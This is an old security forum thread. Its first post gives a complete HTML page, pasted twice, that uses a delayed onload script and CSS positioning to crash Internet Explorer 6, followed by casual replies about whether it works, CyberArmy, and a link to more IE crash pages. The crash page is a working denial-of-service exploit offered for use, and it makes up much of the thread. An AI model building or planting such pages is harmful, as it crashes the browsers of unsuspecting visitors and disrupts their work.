-
IE 6 crash
<html>
<head>
<title>CRASH-IE</title>
<style type=3D"text/css">
html, body {
overflow-y: hidden;=20
scrollbar-base-color: '#330066';=20
}
=20
.crash {
position:absolute;
left:200px;
top:200px;
width:200px;
}
</style>
<script type=3D"text/javascript">
function galgenfrist() {
window.setTimeout('crashIE();',1000);
}
function crashIE() {
var moveNode =3D document.getElementById("move");
if(moveNode) {
moveNode.style.top =3D "100px";=20
moveNode.style.left =3D "200px";
}
}
</script>
</head>
<body onload=3D"galgenfrist();">
<h1>CRASH-IE</h1>
<div id=3D"move" class=3D"crash">
<table>
<tbody>
<tr>
<td>
<textarea></textarea>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>
<html>
<head>
<title>CRASH-IE</title>
<style type=3D"text/css">
html, body {
overflow-y: hidden;=20
scrollbar-base-color: '#330066';=20
}
=20
.crash {
position:absolute;
left:200px;
top:200px;
width:200px;
}
</style>
<script type=3D"text/javascript">
function galgenfrist() {
window.setTimeout('crashIE();',1000);
}
function crashIE() {
var moveNode =3D document.getElementById("move");
if(moveNode) {
moveNode.style.top =3D "100px";=20
moveNode.style.left =3D "200px";
}
}
</script>
</head>
<body onload=3D"galgenfrist();">
<h1>CRASH-IE</h1>
<div id=3D"move" class=3D"crash">
<table>
<tbody>
<tr>
<td>
<textarea></textarea>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>
the above html should cause ie6 to crash immediately
-
any way or patch to prevent that from happening with this code ? ? ? ?
-
`When you say "I wrote a program that crashed Windows", people just stare at
you blankly and say "Hey, I got those with the system, *for free*".'
(By Linus Torvalds)
kindof applies since IE comes with windows and microsoft makes both.
But seriously, thanks for the heads up.
-
Mine didn't crash... just opened normally and worked fine.. got two lines of text and two text boxes..
-
Well I just saw the code :P But that's cuz I'm using Mozilla at this point... advance in technology :D
-
i couldn't get it to crash mine either.
-
Quote:
Originally posted here by ead23x3
i couldn't get it to crash mine either.
Leave it on for a few hours.
-
Um.. how do you go about to run the script?
Thanx!
-
CyberArmy also has something similiar that is SUPPOSED to crash/and or shut down your computer if you fail their Zebulun challenges. The basic idea has been around for quite a while now, but good try :)
-
knoledgesponge, some moron posted that a link a while back.. too bad Cyberarmy is down adn what not.. here's the link to the moron's post: http://www.antionline.com/showthread...hreadid=224037
-
CYBERARMY IS NOT DOWN!!!! It has just moved to Cyberarmy.net, because we had some problems with the original founder... :) have fun!
-
cyberarmy.net doesn't exist..
-
Cyberarmy
It exists on my browser.....
-
Quote:
Originally posted here by knoledgesponge
CyberArmy also has something similiar that is SUPPOSED to crash/and or shut down your computer if you fail their Zebulun challenges. The basic idea has been around for quite a while now, but good try :)
knoledgesponge, you mean something like this? :cool:
-
Nice little script... how about showing me one in Java (not script)?
And now cyberarmy.net works.. that was odd.. it was off for a few mins for me..
-
Our friend Eastwood (noodle) has some more.. (I just host them)
http://tp2.be/eastwood/ie/main.htm
try wich ones crash your box..